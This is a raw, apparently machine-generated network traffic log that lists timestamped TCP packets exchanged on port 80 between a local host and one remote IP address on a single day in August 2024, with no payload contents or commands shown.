                                Aug 27, 2024 09:49:39.062084913 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.062104940 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.062412977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.062422991 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.062433004 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.062443972 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.062448978 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.062458992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.062464952 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.062478065 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.062479019 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.062489033 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.062493086 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.062494993 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.062499046 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.062504053 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.062515020 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.062535048 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.062542915 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.062546015 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.062557936 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.062570095 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.062572956 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.062580109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.062592030 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.062602997 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.062603951 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.062614918 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.062627077 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.062629938 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.062638998 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.062644958 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.062653065 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.062669039 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.062691927 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.063203096 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.063215017 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.063225031 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.063230038 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.063235998 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.063241005 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.063245058 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.063257933 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.063267946 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.063281059 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.063292027 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.063302040 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.063313961 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.063332081 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.063344002 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.063353062 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.063363075 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.063364029 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.063380003 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.063393116 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.063405037 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.063410044 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.063416958 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.063427925 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.063431025 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.063438892 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.063448906 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.063457012 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.063460112 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.063467979 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.063472033 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.063482046 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.063488960 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.063493013 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.063503027 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.063507080 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.063543081 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.064143896 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.064156055 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.064166069 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.064177990 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.064188957 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.064201117 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.064202070 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.064209938 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.064210892 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.064223051 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.064229965 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.064234018 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.064244986 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.064254045 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.064258099 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.064275980 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.064277887 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.064287901 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.064296007 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.064299107 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.064310074 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.064320087 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.064321041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.064331055 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.064342976 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.064344883 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.064354897 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.064363003 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.064368010 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.064378977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.064389944 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.064398050 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.064402103 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.064413071 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.064421892 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.064423084 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.064435005 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.064445019 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.064446926 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.064457893 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.064462900 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.064492941 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.065102100 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.065113068 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.065124989 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.065135956 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.065145969 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.065146923 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.065159082 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.065171003 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.065176964 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.065181971 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.065185070 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.065192938 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.065205097 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.065212011 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.065223932 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.065234900 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.065236092 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.065246105 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.065258026 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.065268040 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.065279961 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.065279961 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.065291882 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.065304995 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.065313101 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.065313101 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.065316916 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.065325022 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.065327883 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.065339088 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.065346003 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.065350056 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.065362930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.065372944 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.065375090 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.065387011 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.065396070 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.065398932 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.065409899 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.065411091 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.065422058 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.065438986 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.065460920 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.066042900 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.066055059 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.066063881 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.066076994 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.066087008 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.066093922 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.066097975 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.066109896 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.066122055 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.066124916 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.066132069 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.066143036 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.066149950 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.066154957 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.066168070 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.066173077 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.066181898 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.066183090 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.066193104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.066205025 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.066216946 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.066217899 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.066229105 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.066241026 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.066240072 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.066251040 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.066251993 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.066262007 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.066271067 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.066277027 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.066277981 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.066288948 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.066301107 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.066303968 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.066313982 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.066322088 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.066324949 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.066337109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.066343069 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.066349030 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.066356897 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.066386938 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.067002058 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.067013025 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.067022085 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.067040920 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.067044973 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.067050934 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.067063093 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.067074060 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.067085028 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.067085981 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.067097902 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.067105055 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.067110062 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.067122936 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.067128897 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.067140102 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.067152023 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.067162037 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.067162991 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.067173004 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.067181110 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.067184925 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.067197084 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.067198992 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.067209959 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.067223072 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.067224979 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.067236900 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.067255020 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.067255020 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.067270041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.067281008 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.067282915 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.067293882 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.067306042 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.067312002 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.067317963 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.067329884 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.067342043 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.067346096 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.067353010 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.067370892 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.067389011 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.067873001 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.067884922 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.067893982 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.067905903 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.067917109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.067929029 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.067929983 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.067939997 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.067951918 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.067955971 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.067972898 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.067991018 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.068025112 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.068202972 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.068213940 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.068223953 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.068237066 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.068248034 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.068259001 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.068263054 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.068279028 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.068289042 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.068290949 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.068300962 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.068301916 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.068312883 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.068325043 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.068329096 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.068336010 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.068346977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.068351984 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.068357944 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.068370104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.068381071 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.068382025 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.068393946 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.068408012 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.068409920 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.068418980 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.068423986 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.068430901 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.068443060 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.068448067 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.068454027 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.068468094 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.068473101 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.068489075 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.068502903 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.068505049 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.068527937 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.068861961 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.068873882 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.068885088 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.068909883 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.068929911 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.069011927 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.069022894 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.069034100 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.069046021 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.069052935 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.069091082 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.069258928 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.069269896 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.069281101 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.069293022 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.069304943 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.069310904 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.069315910 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.069330931 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.069334030 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.069341898 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.069354057 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.069354057 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.069376945 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.069782972 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.069799900 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.069811106 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.069822073 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.069823027 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.069833040 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.069835901 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.069844961 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.069856882 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.069863081 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.069868088 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.069879055 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.069890976 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.069901943 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.069902897 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.069912910 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.069921017 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.069925070 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.069941044 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.069946051 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.069952965 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.069962978 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.069967985 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.069974899 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.069986105 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.069991112 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.069998980 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.070009947 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.070014954 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.070020914 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.070031881 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.070034027 CEST4971580192.168.2.8188.114.96.3
